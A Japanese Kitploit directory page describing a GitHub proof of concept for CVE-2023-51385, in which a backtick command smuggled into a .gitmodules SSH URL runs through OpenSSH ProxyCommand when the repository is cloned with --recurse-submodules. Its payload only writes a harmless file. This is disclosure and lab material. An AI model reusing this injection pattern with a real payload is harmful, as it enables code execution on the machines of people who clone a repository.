Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-51385_test — CVE-2023-51385の概念実証:`--recurse-submodules`を使用したクローン時に悪意のあるgitサブモジュールURLを介したコマンドインジェクションを実証し、OpenSSHのProxyCommandを悪用します。 | Kitploit
ツール/GitHubGitHub/featherw1t/cve-2023-51385_test
脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育ラボと実践
GitHubfeatherw1t/cve-2023-51385_test

CVE-2023-51385_test

CVE-2023-51385の概念実証:`--recurse-submodules`を使用したクローン時に悪意のあるgitサブモジュールURLを介したコマンドインジェクションを実証し、OpenSSHのProxyCommandを悪用します。

リポジトリを見る
2年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-51385 の検証

まず、~/.ssh/config に以下の内容を追加する必要があります

root@kitploit:~
host *.example.com
  ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p

.gitmodules ファイルの文にはコマンドインジェクションが存在します

root@kitploit:~
url = ssh://`echo helloworld > cve.txt`foo.example.com/bar

設定が完了したら、以下のコマンドを実行してトリガーします

root@kitploit:~
git clone https://github.com/LtmThink/CVE-2023-51385_test --recurse-submodules

正常に実行されると、CVE-2023-51385_test ディレクトリに cve.txt ファイルが生成されます

注意: OpenSSH は 9.6p1 未満である必要があります

詳細情報は次のブログを参照してください:

https://vin01.github.io/piptagole/ssh/security/openssh/libssh/remote-code-execution/2023/12/20/openssh-proxycommand-libssh-rce.html

ツールをダウンロード